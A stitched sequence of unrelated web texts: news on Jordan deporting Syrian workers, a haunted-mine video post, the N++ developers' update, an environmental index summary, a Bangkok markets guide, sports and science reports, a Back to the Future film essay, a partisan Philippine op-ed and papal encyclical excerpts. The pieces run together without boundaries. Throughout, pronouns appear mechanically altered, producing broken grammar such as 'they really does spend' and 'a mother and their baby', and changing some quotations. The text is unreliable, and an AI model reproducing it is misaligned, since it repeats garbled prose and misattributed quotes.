I remember my own UB40 and signing off every thursday in Catford… between the leaving school and starting my first job in the post office selling stamps :-), the chap that was paying me cash-in-hand, a printer, gave me the afternoon off, so accommodating.
It took ages to write this bit, so I went through a few things including, Tubeway Army, and then Thin Lizzy and to be honest I'm now listening to Talking Heads, and no points for guessing which album that on is.
AMERICAN PALE ALE
American Pale Ales are light in color, ranging from golden to a light copper color. The style of this beer is defined by the American hops used. American hops typically have high bitterness and aroma.This is a perfect beer for big fare like grilled burgers or combination pizzas, as well as lighter fare like sushi and green salads
Advertisements
Jordan plans to deport 5,723 'illegal' Syrian workers
AMMAN - Agence France-Press
Syrian refugees shout slogans against Syria's President Bashar al-Assad during a rally in support of the Free Syrian Army, at Al Zaatri refugee camp in the Jordanian city of Mafraq, near the border with Syria September 26, 2013. REUTERS photo
Jordan will deport 5,723 "illegal" Syrian workers next month unless they obtain government permits, the labour minister said Monday, as the country struggles to cope with an influx of refugees.Nidal Qatamin told state-run Petra news agency that 15,000 illegal workers, including 5,723 Syrians, were in the kingdom. "They will be deported starting November 11 unless they obtain required permits and legalise their situations," said Qatamin.He did not say if the Syrian workers had crossed the border into Jordan among waves of refugees who have fled their country's deadly conflict or if they have arrived there before the war broke out there in March 2011.Qatamin added that the decision to expel illegal workers was aimed at helping "provide jobs for Jordanians" and organising the labour market.Officials in the kingdom say unemployed Jordanians face tough competition from Syrians for jobs.Unofficial estimates put the number of Syrian workers in the country at around 160,000. The government does not have official figures on the number of Syrians working in the kingdom.Jordan is hosting around 550,000 Syrian refugees, mostly in the north, including in the Zaatari refugee camp, which is home to more than 130,000 people.Jordanians have repeatedly called for aid, saying the growing refugee influx has placed a huge burden on already overstretched water and power supplies as well as housing and education.
YouTube is awash with blatantly fake videos of paranormal evidence as far as the eye can see, which is why when I stumbled across a set of videos entitled “The Horton Mine: Encountering a Ghost in a Haunted, Abandoned Mine” I let them sit in my bookmark folder for a week before actually sitting down to watch them. Boy, was I wrong.
The videos, which were shot over the course of a year, were filmed by the YouTube channel Exploring Abandoned Mines in CA, NV, and AZ. I should note that the camera man, known only as Frank, isn't a ghost hunter, in fact, their channel has nothing to do with ghosts or the paranormal at all. He's an urban explorer who sticks to poking around in underground tunnels and mines, documenting the past in the process.
ADVERTISEMENT
The tunnel in question is California's Horton Mine, which was used in the late 70s as a transport tunnel to move ore from the nearby Victorine Mine. According to Frank, the mine has been abandoned for years, which is obviously one of the reasons it drew their attention in the first place.
In the first video (below), which was shot in the summer of 2013, Frank makes their way down the tunnel, nearly making it to the end before something catches their attention. Hanging from the ceiling of the mine are countless chains, which at the time would have been used to help suspend the ventilation tubing. What's strange is that only one of those 40 pound chains suddenly begins to swing, while the others remain untouched.
I won't lie, if I was Frank I would have hit the bricks in an instant. There's something about the consistency of the swaying that is so unbelievably off-putting. Watch the video and you be the judge:
If you thought that was creepy, just wait. The second video, which was shot one year later, is a hell of a lot more interesting. In this clip Frank finally makes it all the way to the back of the mine, and just as they begin to head back in the direction of the entrance, the mine shaft erupts with the strange sound of men talking. Obviously shocked, they panic and begins to make their way out of the mine, and just as quickly as it started, the strange sounds are gone. Skip ahead to 7:30 mark if you just want to hear the mysterious sounds.
There are a lot of theories floating around in the video comments section about what could have possibly made the sounds, from discarded walkie-talkies, to a radio signals, to the fringe “recorded stone” theory. One YouTuber believes they were able to make out what the strange voices are actually saying, and even stranger, they say the voices are speaking French. Here's the translation:
“Why pass?
Are you prepared to die?
(expletive)
who are you?
you went too forward
near us
now go”
(french police siren)”
Whatever conclusion you come to, I think we can all agree that the videos are undeniably creepy and definitely worth a watch. For added effect, I highly recommend waiting until you're the only one awake at 1am and giving them a listen…
What do you think? Did the unnamed camera man capture the voices of miners from the other side? Watch the videos and leave your thoughts in the comment section below!
Feature image via Redneck Revolt under Creative Commons License
MORE GREAT STORIES FROM WEEK IN WEIRD:
It has now been 3 months since N++ launched, and it's safe to say that there have been some highs and lows.
On the plus (plus) side, we're incredibly happy with N++. It's a great game that is close to what we wanted to make when we set out on this journey. We're so happy with how well the game has been received by critics and fans; there have been a lot of positive reviews, and it's been amazing hearing from players who really enjoy what we tried to do.
We're having a great time watching people stream N++, from casual players, to co-op streams, to people brave enough to pursue all-gold badges; especially awesome was a series of streams which showed someone tackling the secret challenges and unlocking the secret levels! Thank you so much to everyone who has streamed N++, we really love watching 🙂
It has also been amazingly gratifying to see so much creativity and awesomeness from the level-making community; we've been trying to document some of our favourites via the in-game “Featured” section, as well as on our tumblr: http://metanetsoftware.tumblr.com/
Unfortunately, it hasn't all been positive. There are several bugs in the game, including a severe (thankfully, rare) savegame-corrupting bug. And, though not a bug, no one has yet managed to unlock the Platinum trophy by beating all of the levels in the game (including Co-op and Race). Rest assured, all of these issues will be addressed in an upcoming patch.
Which brings us to the major challenge we've been facing since launch: After N++ launched, Shawn (N++'s programmer) decided that they couldn't continue to help us make N++. We're currently working with them to get a patch ready that will fix all of the bugs and problems with the launch version, but their time is very limited. We wish them all the best in their future endeavors.
Don't worry: we have had ups and downs over the entire 11-year course of this project — we didn't give up then and we don't intend to give up now. We're confident that we can find someone to continue the programming work required to move N++ forward into the future. This has definitely put a kink in our post-launch plans, and has made the future a lot more challenging than we had anticipated, but we are determined to make it a bright one regardless.
What does this future hold? We're still excited about releasing updates which will add new content and features (we really can't wait for you all to try them), and we're also still working towards bringing N++ to more platforms — especially Steam, which is our top priority. We hope to have more news about these exciting new developments soon.
Finally, at launch we announced that we would not be putting N++ on sale. While we had intended to push back firmly against the race to the bottom (following Dan Adelman's fearless example: http://gamasutra.com/blogs/DanAdelman/20150227/237639/On_Indie_Game_Pricing.php), it seems that the only tangible result of our decision has been to alienate a sizable portion of the audience. We really want as many people to play N++ as possible, and as a result we have decided we will be participating in a couple of promotional discounts in the future after all, to hopefully encourage more people to give N++ a try. Again, stay tuned as we will announce any news on Twitter (https://twitter.com/metanetsoftware) as soon as we have it.
We really want to wholeheartedly thank everyone who has already given N++ a try — we really appreciate it and we hope you're enjoying it so far. There's more to enjoy on the way! We are committed to bringing N++ to as many people as possible, because we know that we have made something that is worthy of being played — and although that means reconsidering some of our positions and making some difficult choices, it's important to figure out how to get people to play it and how to continue to support the community of players. So aside from the updates and bugfixes, that's what we're working on now.
If there's anything that developing and playing N++ has taught us, it's that you can never lose as long as you never give up. This is a lesson we intend to follow. We need to extend our heartfelt thanks to you, our players, for the encouragement and support you've offered us over the years. We hope to have more exciting news for you in the near future 🙂
On an upbeat note, if you're in the New York City area mid-November, there are two events you might be interested in! First, Mare is speaking at PRACTICE about level design:
http://gamecenter.nyu.edu/practice/
And second, on November 15th there will be a super cool event at Babycastles featuring N, N+, and N++! There will be a tournament, and prizes, and we'll be there to chat about the games and hang out. You should come!
https://www.facebook.com/events/957006181036915/
Global metrics for the environment
Careful measurement of environmental trends and progress provides a foundation for effective policymaking. The 2018 Environmental Performance Index (EPI) ranks 180 countries on 24 performance indicators across ten issue categories covering environmental health and ecosystem vitality. These metrics provide a gauge at a national scale of how close countries are to established environmental policy goals. The EPI thus offers a scorecard that highlights leaders and laggards in environmental performance, gives insight on best practices, and provides guidance for countries that aspire to be leaders in sustainability.
The Logic of Environmental Metrics
The world has entered a new era of data-driven environmental policymaking. With the UN's 2015 Sustainable Development Goals, governments are increasingly being asked to explain their performance on a range of pollution control and natural resource management challenges with reference to quantitative metrics. A more data-driven and empirical approach to environmental protection promises to make it easier to spot problems, track trends, highlight policy successes and failures, identify best practices, and optimize the gains from investments in environmental protection.
Two Dimensions Of Environmental Performance
With 20 years of experience, the EPI reveals a tension between two fundamental dimensions of sustainable development: (1) environmental health, which rises with economic growth and prosperity, and (2) ecosystem vitality, which comes under strain from industrialization and urbanization. Good governance emerges as the critical factor required to balance these distinct dimensions of sustainability.
Tracking two fundamental dimensions of sustainable development: (1) environmental health, which rises with economic growth and prosperity, and (2) ecosystem vitality, which comes under strain from industrialization and urbanization.
2018 EPI Framework
The 2018 EPI Framework organizes 24 indicators into ten issue categories and two policy objectives.
For many tourists, expats and locals, a huge attraction of the City of Angels is the brilliant Bangkok market scene.
Shopping and food are essential parts of Thai culture, and Bangkok is brimming with all kinds of markets where you can find exciting shopping experiences, load up on bargains and souvenirs, and fill your belly.
From floating markets to night markets to flower markets to weekend markets…
We've rounded up our ten favourite markets in Bangkok that are worth a visit or two…
Talat Rot Fai Night Market
A post shared by Chiaki Tanaka (@ciao.31) on Aug 27, 2017 at 9:15am PDT
If you've got a taste for anything retro you'll love Talat Rot Fai Night Market.
This characterful and quirky market has a wealth of vintage clothes, homewares and antiques for sale, and it attracts a youthful hipster crowd nightly, thanks to some pubs and mobile bars in VW campers, tasty food stalls selling noodle and fresh seafood, and live bands.
With a bit of rummaging it's possible to find some really unique items here, and with the fun vibe and party atmosphere you'll probably wind up entertaining yourself here for the whole evening.
There are actually two versions of Rot Fair:
The original Talat Rot Fai on Srinakarin Soi 51, at the rear of Seacon Square shopping mall. You'll need to take the BTS to On Nut, then take a taxi or motorsai to the market. It's open from 5pm to 1am, Thursday to Sunday. Rot Fai 2 in Ratchada is next to the National Cultural Centre MRT station. It's open from 2pm to midnight from Thursday to Sunday.
While Rot Fai 2 is much easier to get to than the original, it is a little smaller and more popular with tourists. Still an excellent Bangkok night market to experience, however!
>>> Bangkok's best night markets
Bangkok Flower Market (Pak Klong Talat)
One of the most famous Bangkok markets, Pak Klong Talat is an vivid riot of colour and scent.
Vendors at this flower market work non stop all around the clock selling beautiful bouquets and garlands of marigolds, roses, tulips, lilies, orchids and just about any other flower you can think of that are imported from all over Thailand as well as the rest of the world.
Flowers are sold wholesale, so prices are low, but be prepared to buy in bulk for the best deals. Although flowers are the main focus, there's also a thriving market for fruit and vegetables inside too.
The market used to spill over hugely to the walkways outside the main structure of the market, but a clean-up operation has seen it scaled back recently.
For tourists, the best time to visit the flower market is during the day — the market sees the most crazy activity in the early hours of the morning when Bangkok's business traders come down to buy their flowers in bulk — but you'll likely find it a little overwhelming at 3am!
Pak Klong Talat is located on Chak Phet Road and is best accessed by Chao Phraya river boat from Saphan Phut or Rajini piers. The market is open 24 hours a day, 7 days a week.
Bang Nam Phueng Market
A post shared by ZAFENTURE (@zafenture) on Aug 20, 2017 at 9:19pm PDT
One of Bangkok's smaller floating markets, Bang Nam Phueng market is situated in a more rural part of the city, and a trip here provides a pleasant contrast to the hectic pace of Bangkok city life. Unlike some of the more famous floating markets, you'll get to see an authentic slice of Bangkok life — not just performative scenes for tourists.
Although there are a few vendors in boats here, the majority of the market is on the riverside, and there are many different traditional Thai foods and treats available, so it's an excellent opportunity to indulge.
Take a pew on one of the benches and dine al fresco on fresh fruits from local farms, steaming bowls of noodles with grilled meats, and seafood pancakes.
The market is a little out of the way, found in the so-called ‘Green Lung' of Bangkok, Phra Pradaeng, on Bangnaum Road on the eastern side of the city. We'd recommend taking the cross-river ferry from Wat Bang Na Nawk and then a motosai to the market.
It's open on Saturday and Sunday from 8 am to 4 pm.
>>> Bangkok's best floating markets
Chatuchak Weekend Market
The immense Chatuchak weekend market is famous the world over and is quite possibly the best market and most popular in Bangkok.
One of the largest weekend markets in the world, it sprawls over 38 acres, and you can find everything here including handicrafts, homewares, art and antiques, fashion and jewellery, plants, pets and pet accessories, ceramics, vintage items and much more.
Be prepared to haggle to grab yourself a bargain, and allow at least half a day or longer to immerse yourself in this unique shopping experience. We'd recommend going early to avoid the beating midday sun.
To get to Chatuchak take the BTS Skytrain to Mo Chit station. From there it's an easy walk to the market – just follow the crowds. The market is open on Fridays from 6 pm to midnight, and on Saturdays and Sundays from 9 am to 6 pm.
>>> Complete guide to Chatuchak Weekend Market
JJ Green
A post shared by 🅽🅰🅿🆂 (@naps.worldwide) on Dec 23, 2016 at 10:18pm PST
If you like the idea of Chatuchak market but are put off by the hordes of tourists and sweltering heat, consider paying the more relaxed night market version a trip instead.
Not far from Chatuchak, JJ Green market (also known as JJ Night Market) is a popular Bangkok night market with a supremely chilled atmosphere.
Shoppers come here for the eclectic array of vintage items, clothing, handicrafts and antiques on offer, and it's also a big hit with trendy young Thais who come to hang out and enjoy the entertainments, including street artists and live music.
It's also a great place to come to fill up on food, as there are plenty of vendors selling tasty Thai snacks, pizzas, macaroni cheese, noodles, ice creams and more.
There's less here than you'd find at the daytime market, but fewer tourists and more space — if anything, you more likely to find some decent finds here.
JJ Green market can be found just behind Chatuchak market. It's open from Thursday to Sunday from 5 pm to midnight, but is most fun at the weekend when it's at its busiest.
Or Tor Kor Market
In the North of Bangkok, Or Tor Kor Market is a favourite destination for foodies — so much so that it was voted the 4th best fresh market in the world.
This gourmet fresh food market is housed in a huge and is well known for the quality of the produce on sale there.
There are plenty of photo opportunities here, with multicolored fruits and vegetables piled high, bowls of rich spices, meats and seafood, and a host of delicious prepared meals like duck noodles to take away, plus snacks and sweet treats such as coconut pancakes to try.
Or Tor Kor Market is on Kamphaengphet Road, opposite Chatuchak Weekend Market. It's nearby Kamphaeng Phet MRT station and is open from 6 am to 8 pm every day.
Klong Toey Fresh Market
Another excellent market selling fresh produce, Klong Toey Fresh Market is in the middle of Bangkok's slum district and is the starting point for many of the street food vendors selling their wares throughout the city.
This Bangkok market has a friendly atmosphere, is absolutely huge, and it's possible to get some great deals on some of the freshest fruits, vegetables, meats, fish and seafood available in Bangkok. A visit here is well worth the trip.
It doesn't seem quite as organised and sanitised as Or Tor Kor, but prices are definitely cheaper.
Tucked away on Rama IV Road in a concrete block building, Klong Toey Fresh Market is open every day from 6 am to 2 am. The closest public transport is the Klong Toey MRT station, around 10 minutes walk away.
Sampeng Market
A post shared by Seulki Kim (@kiseulkim) on Aug 11, 2017 at 4:03pm PDT
For wholesale goods at rock bottom prices, head down to Chinatown and Sampeng Lane Market.
Winding narrow lanes are jam packed with cheap goodies including clothes and accessories, beauty products, jewellery, DVDs, electronics, fabrics and souvenirs. Copied DVDs and fake brand names are in abundance here too.
It can get pretty hot and chaotic at this popular market, but it is also fun. Most items are wholesale, so be prepared to buy in bulk to get the best bargains.
The labyrinthine layout of the market, and sheer number of vendors and buyers, means that your progress will be slow as you walk around — abandon all hope of a quick dash through. There are plenty of stops for street food and drinks if you need a pick-me-up.
Sampeng market is on Sampeng Lane, Soi Wanit 1, in the heart of Bangkok's Chinatown. It's open every day from 8 am to 6 pm.
Suan Lum Night Bazaar
A post shared by Suan Lum Night Bazaar Ratchada (@suanlumnight) on Sep 22, 2016 at 8:11am PDT
In addition to a huge number of street stalls and shops in the covered market area, the mammoth Suan Lum Night Bazaar is also brimming with entertainment options — it's a great place to take in a cabaret or magic show, listen to some live music, or experience the spectacle of Muay Thai boxing.
As you would expect there are heaps of vendors selling food to keep you filled up as you browse the handicrafts, clothes, jewellery and souvenirs. There are also some great restaurants if you fancy a full blown Thai meal too.
Situated at the busy Ratchada-Lad Prao Intersection on Ratchadaphisek Road, Suan Lum Night Bazaar is open every day from 4 pm to midnight. Take the MRT to Lat Phrao station.
Wang Lang Market
A post shared by ~ Dao ~ (@tiinael) on Jul 25, 2017 at 2:12am PDT
On the banks of the Chao Phraya river, this pleasantly un-touristy market is popular with locals and the large student community housed nearby.
The streets here are crammed with food stalls, making it the ideal spot to sample some delicious Thai street food such as grilled meats, sweetmeats, fresh fruit juices, and pancakes. You'll also find a good selection of clothes, jewellery, retro items and handicrafts.
Wang Lang Market is situated at Wang Lang pier next to Siriraj Hospital on Phran Nok Road in Thonburi. That warrants a crossing of the river!
Take a ride on the Chao Phraya express boat to get there; it's open from 10 am to 5 pm daily.
What's your favourite Bangkok market?
Featured image is by aotara (CC BY 2.0 licence)
Pin 5 334 Shares
Comments
comments
The orangutan is one of the most endangered great apes
A hitherto unknown population of orangutans numbering perhaps 1-2,000 has been found on the island of Borneo, conservation researchers say.
Members of the reclusive endangered species were found by scientists acting on tip-offs from local people.
Much of the orangutan's tropical forest habitat in Indonesia and Malaysia has been cut down for timber extraction and to create palm oil plantations.
About 50,000 orangutans are thought to remain in the wild.
"The reclusive red-haired primates were found in a rugged, largely inaccessible mountainous region," Erik Meijaard, of Nature Conservancy Indonesia, said.
The journey to the region took 10 hours by car, another five by boat and then a couple more hours hiking.
The team found more than 200 nests crammed into just a few kilometres and spotted three wild orangutans in the canopy above them - a mother and their baby, and a large male who broke off branches to throw at them.
It is even possible, the researchers say, that this could be a kind of orangutan refugee camp - with several groups moving into the same area following widespread forest fires.
The team of scientists is now working with local groups to try to protect the area.
Defending champions the Cote d'Ivoire had to come from behind twice to earn a 2-2 draw with the Democratic Republic of Congo Friday in a lively Africa Cup of Nations clash.
The result in the northern Gabonese town of Oyem kept the vibrant Congolese top of Group C with four points from two matches followed by the Ivorians with two.
Togo has one point and Morocco, their opponents later Friday in the second match of a double-header, are pointless.
Another defeat for Morocco, guided by twice Cup of Nations-winning coach Herve Renard, and they will be eliminated having gone down by a lone goal to DR Congo four days ago.
Neeskens Kebano and Junior Kabananga scored for the Congolese while Wilfried Bony and captain Geoffrey Serey Die got the Ivorian goals.
The fixture had a history of goals with four previous Cups of Nations meetings delivering 13, including four when the Cote d'Ivoire won a semi-final 3-1 two years ago.
It was no surprise, then, that a lively first half in which both sides were committed to attack ended 2-1 in favour of the Congolese.
After only one goal in the opening two matches in Oyem, this was a welcome change for spectators seeking goalmouth excitement.
Kebano put twice champions DR Congo ahead on nine minutes with a sizzling shot across goalkeeper Sylvain Gbohouo into the far corner of the net.
The goal stemmed from a throw-in to Kabananga, who pushed it back to Kebano, whose first name stems from the respect their father had for former Dutch star Johan Neeskens.
DR Congo were looking sharper than the title-holders until recalled Bony began to make an impact from midway through the half with their aerial strength. They nodded narrowly wide on 22 minutes and soon after equalised with a powerful glancing header past goalkeeper Ley Matampi following a corner.
The teams remained level for only three minutes, though, before Kabananga put the Congolese ahead again with their second goal of the tournament.
Unmarked at the far post, they soared to powerfully nod a cross past Gbohouo, who plays their club football in DR Congo with six-time African champions TP Mazembe.
Cote d'Ivoire equalised again midway through the second half with a deflected shot from Serey Die leaving Matampi stranded.
Substitute Salomon Kalou thought they had snatched a stoppage-time winner for the Ivorians, but was correctly ruled offside.
Image gallery
AFP
Jun 4th, 2013 | Viewing | Comments
WHERE: In the living room of my apartment in Portland, ME (Isla Nublar)
FORMAT: Blu-Ray on a Vizio 32″ LED HDTV
COMPANY: Cinemanaut Becca joined me for the last twenty minutes. They mostly talked about the cinematography.
PHYSICAL AND MENTAL STATE: Feeling shitty? Meant to get this done on Thursday, random life crap pushed it all the way to Saturday. Eating some kickass homemade breakfast burritos.
Are you familiar with the screenwriting term “save the cat“?
It's a term used by Blake Snyder in their book of the same name on how to structure a screenplay. The basic idea is that you need to show your main character performing a selfless act in the early moments of the film so the audience is rooting for them or them This is especially important if the character has some not-so-nice qualities. One example is Aladdin from the animated Disney film. Even though he's a thief, they give the food he's worked so hard to steal to a couple of starving kids. Or, if you've been with our site from the beginning, take Maverick from Top Gun. They may be a cocky womanizing son of a bitch, but they risk their lives to help Cougar land their plane in the very first scene. (Yeah, Cougar. Maverick saved a guy whose call sign is a cat. It blew my mind.) So, even the world's biggest prick can warm up the audience with a simple good deed. At least, according to the guy who wrote Stop! Or My Mom Will Shoot.
Also, Blank Check. Really.
Whether you think saving the cat is a brilliant nugget of cinematic wisdom or a crock of shit sold by some guy whose body of work isn't backed up by their philosophies, we're here to talk about Back to the Future. Marty McFly doesn't come across like a total dickhead, but you still want the audience to know he's a nice guy, right? So, let's see if any of their actions in the film's earliest moments qualify as a cat-saving moment.
Oof, that's one costly electric guitar note.
Okay, so Marty inconsiderately turns up every single knob on Doc's enormous amplifier, bothering the neighbors and destroying a very expensive piece of equipment, one that must have taken their friend many hours to build. Alright, so that's a bit self-centered, but I'm sure they can redeem himself…
…by hitching a ride to school on the backs of motor vehicles. That's rude and dangerous. Alright, he's clearly a wild card character, but they were just late for school! This one rushed decision doesn't mean he's a complete asshole to everyone they meet. He's nice enough to give Clocktower Lady a quarter and take one of their flyers…
…but he's clearly just trying to shut the old bag up. They quickly did the social math and knew that a measly quarter would strike the correct balance between financial loss and rapport with the enemy. Shit. Okay, they do something nice later on, I promise. I have it in my notes. After they hitch a ride home–
DAMMIT, MARTY. No. I could accept the piggybacking on cars when you were late for school, but you pull this shit all the time? And on cops? Are you stupid? We're twelve minutes into the movie at this point and Marty hasn't given one solitary shit about anybody that isn't likely to give them a sleeping bag HJ this weekend.
Okay, so Marty goes home, whines to their father about Biff wrecking the car (jerk), shoots them judgmental glances all throughout dinner (jerk), and forgets that they were supposed to meet Doc in the Twin Pines Mall parking lot at 1:15 the next morning (jerk jerk jerk). Doc wakes them up with a phone call and asks them to grab their video camera from the lab. Surprisingly, Marty doesn't flip off the phone and go back to sleep; they actually drag their ass out of bed and brings the camera to the mall.
“Doc, I charge an hourly videography fee, not flat rate.”
There it is. Our first nice gesture from Marty, a whopping 18 minutes into the movie. But hold on, is this purely selfless? First of all, when I think “selfless act,” it's usually for a complete stranger, but I can let that part slide. Still, something occurred to me during this viewing that I'd never thought of before: Marty never tells Doc about the amp they blew up. At least, we don't see it at any point in the trilogy. Is Marty just holding the camera for Doc to smooth over the news of the thoroughly rocked-out amp?
If you thought setting fire to the living room rug was bad…
Well, if we're not counting filming Doc's temporal experiment, the well of good deeds has run dry. Once Marty ends up in 1955, he's completely concerned with self-preservation all the way to the end of the film. I suppose it could be argued that pushing their teenaged father-to-be out of the path of Sam‘s car is a selfless act; Marty hasn't yet spoken with Doc about preventing their own birth and isn't fully conscious of the repercussions their actions in 1955 might have. Despite being questionably noble and a bewildering 42 minutes into the film, it might be the closest thing we have to a legitimate saving of the proverbial cat.
“This is what helping people feels like? Never. Again.”
If anyone should get credit for saving cats around here, it's Doc. Remember, when Marty shows up on their doorstep, they have no idea who this kid is, but decides to help them despite the overwhelming odds. A case could be made that Doc's real motivation is to see if their time machine works, but there are plenty of other ways to achieve that goal that don't involve getting electrocuted.
In fairness, Doc rarely achieves any goal without getting electrocuted.
This viewing really changed my perception of Marty. He's not evil by any stretch of the imagination, but they really does spend a large portion of the movie acting… morally ambiguous. And they redeem themselves in the end when they write the letter that saves Doc's life, but now we're talking about using time travel for personal gain, and that's a big enough ethical topic to fill the rest of this year's articles.
How great would it be if all the letter said was, “You peeked, you son of a bitch”?
Now, I don't usually buy into “surefire” screenwriting techniques, but for mostly ignoring the “save the cat” rule, I don't think anyone can say that Back to the Future was a critical or financial failure. (Though I hear the studio tried to argue that second point.) I kind of wonder what it says about the 1980s that a somewhat selfish character can deliver box office gold, but again, I didn't see Marty as even remotely selfish until I started looking for that specific trait. I still think he's a great character, but what do I know? I didn't write Blank Check.
Rest in peace, Blake Snyder.
Chemical agents dropped from a plane on the 2010 BP oil spill in the Gulf of Mexico removed oil from the water's surface but did not help fully degrade it, a new study indicates.
The research, led by scientists at the University of Georgia, shows that the dispersants actually suppressed oil-eating bacteria and slowed their ability to degrade oil.
After the 210-million-gallon spill from the Deepwater Horizon, the chemical agent Corexit 9500 was applied from air onto the oil slick to help it degrade and aid natural bacteria in the water remove the oil faster.
The maritime area affected appeared to be getting cleaner, but scientists and government officials didn't monitor the bacteria and chemicals, according to lead study author, Samantha Joye, a marine scientist at University of Georgia.
During the research, scientists recreated the conditions of the BP oil spill in the lab, closely monitoring the effects of Corexit 9500 on oil slicks and the microbes that feed on them.
Corexit 9500 didn't lower the presence of all microbes. The chemical agent significantly increased the presence of a family of microbes called colwellia. However, they are not as good at eating oil, Dr. Joye said.
"The fact that dispersants drove distinct microbial community shifts that impacted oil degradation efficiently came as a big surprise," Joye, said in a press release. "It is critical to quantify the factors that influence the efficiency of oil biodegradation in the environment, and that includes dispersants."
"During the spill, Marinobacter were not abundant in deep-water plume samples, possibly as a consequence of dispersant applications," said study co-author Sara Kleindienst, junior group leader at the University of Tübingen in Germany. "Whether natural hydrocarbon degraders were outcompeted by dispersant degraders or whether they were directly affected by dispersant-derived compounds needs to be resolved in future studies."
Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
Joye suggests that much of the oil may still be on the floor of the gulf.
In July, BP agreed to pay $18.7 billion – paid out over 18 years – to settle all government claims that have arisen from the massive spill, which killed 11 workers and destroyed businesses and marine life.
True colors supporting Duterte exposed
0 SHARES Share Tweet
Sincerity is a two-way street. Trust but verify goes the caveat. Everything is great and dandy until compromises and the concessions reach standstill and sincerity becomes a one-way street. That is the time when someone needs to step in and decide!
Vice President Leni Robredo (VPLR) was offered an extra job in the Duterte Administration despite belonging to an opposing party. One that required them to do two things (in their own words), “Be the alter ego, and having the full trust and confidence of the president”. Expectedly they are duty bound to publicly speak with one voice as Cabinet member in pushing the Presidential agenda. No gun was pointed to their head to be housing czar. They could have however stuck to their original alliances, and “causes”, as a principled stand. Rendering public service just as Vice President. It did not go unnoticed Robredo openly spoke to media and hence obliquely critiqued their boss with 1) Extra Judicial Killings; 2) Human Rights abuses; 3) Anti-Marcos Burial; 4) Gender sensitivity; 5) Anti-Death penalty; and 6) Against reverting to the original age for determining minors as criminals etc. VPLR had their own world and their colleagues knew it. They resigned as one “yellow media outlet” indicated. No! They were “constructively fired”. The true color exposed.
The peace talks with the CPP-NPA, at best is expectedly described as “guarded optimism”. The “far left” are in the Duterte government despite running and supporting another “presidentiable”. However, dark clouds gathering over contending ‘terms of reference'; Request all political prisoners be released with amnesty or charges dropped; Exhumation of Marcos burial; No NPA disarmament, etc. in short “end-states” as gauge of their sincerity? Do they want peace or to take over government? The Bangsa Moro peace talks will be frustrated if a solo-MILF peace deal and solo Federal Bangsamoro State is crafted sans Misuari's MNLF and the Sabah territory. So long as Malaysia is central participant, the fault lines will resurrect. The allied colors unraveling the sincerity of “peace” and friendship by Digong. (Erik Espina)
Related
comments
Ministers try to avert Kelly inquest and end speculation by calling for post mortem details to be published on the internet
Ministers want to publish details of Dr David Kelly's post-mortem examination online to end speculation about the weapons inspector's death.
Downing Street yesterday welcomed the disclosure that Attorney General Dominic Grieve is to review calls for a full inquest.
But the Mail has learned ministers would prefer to release the papers without an inquest, out of concern for the scientist's family.
Home Office pathologist Dr Nicholas Hunt said at the weekend they would welcome an inquest into the death of Dr Kelly, right
Officials say Mr Grieve is determined to find a way to 'draw a line' under the affair that avoids upsetting Dr Kelly's widow Janice.
Nicholas Hunt, the pathologist who examined Dr Kelly's body, said at the weekend that the death was a 'textbook case' of suicide and demanded an inquest.
A Government source said Dr Hunt's intervention could give ministers 'a dignified way out' of the controversy over the findings of the Hutton Report.
Dr Kelly, 59, was found dead in July 2003, a week after they were identified as the source of a BBC story claiming the Government 'sexed up' its dossier on Iraq's alleged weapons of mass destruction.
Lord Hutton's inquiry placed a 70-year ban on the publication of files relating to Dr Kelly's death.
But a senior source said: 'It is clear from what Nicholas Hunt has said that there is nothing to hide and it may be that it is better to publish the papers.'
The power to release the papers resides with Justice Secretary Ken Clarke, though Mr Grieve has the legal right to demand access.
A decision is likely to be made after MPs return from summer recess next month. David Cameron's spokesperson said: 'It's a matter for the Attorney General.'
You know the international financial crisis has implications in every aspect of global life when the pope decides to weigh in. Today Benedict XVI issued their third encyclical focusing on the economy. It is widely seen as directed at G-8 leaders gathering in Italy this week. The pope speaks about the need to use the economy to aid the poor and care for the environment, but they also support globalization as a way to relieve poverty and backs the idea of a free market. Here are some excerpts from the encyclical, titled “Charity in Truth” that deal with the economy, business and finance:
The Church has always held that economic action is not to be regarded as something opposed to society. In and of itself, the market is not, and must not become, the place where the strong subdue the weak. Society does not have to protect itself from the market, as if the development of the latter were ipso facto to entail the death of authentically human relations. Admittedly, the market can be a negative force, not because it is so by nature, but because a certain ideology can make it so. It must be remembered that the market does not exist in the pure state. It is shaped by the cultural configurations which define it and give it direction. Economy and finance, as instruments, can be used badly when those at the helm are motivated by purely selfish ends. Instruments that are good in themselves can thereby be transformed into harmful ones. But it is man's darkened reason that produces these consequences, not the instrument per se. Therefore it is not the instrument that must be called to account, but individuals, their moral conscience and their personal and social responsibility.
…
The economy needs ethics in order to function correctly — not any ethics whatsoever, but an ethics which is people-centered. Today we hear much talk of ethics in the world of economy, finance and business.
…
When we consider the issues involved in the relationship between business and ethics, as well as the evolution currently taking place in methods of production, it would appear that the traditionally valid distinction between profit-based companies and non-profit organizations can no longer do full justice to reality, or offer practical direction for the future. In recent decades a broad intermediate area has emerged between the two types of enterprise. It is made up of traditional companies which nonetheless subscribe to social aid agreements in support of underdeveloped countries, charitable foundations associated with individual companies, groups of companies oriented towards social welfare, and the diversified world of the so-called “civil economy” and the “economy of communion”. This is not merely a matter of a “third sector”, but of a broad new composite reality embracing the private and public spheres, one which does not exclude profit, but instead considers it a means for achieving human and social ends. Whether such companies distribute dividends or not, whether their juridical structure corresponds to one or other of the established forms, becomes secondary in relation to their willingness to view profit as a means of achieving the goal of a more humane market and society. It is to be hoped that these new kinds of enterprise will succeed in finding a suitable juridical and fiscal structure in every country. Without prejudice to the importance and the economic and social benefits of the more traditional forms of business, they steer the system towards a clearer and more complete assumption of duties on the part of economic subjects. And not only that. The very plurality of institutional forms of business gives rise to a market which is not only more civilized but also more competitive.
…
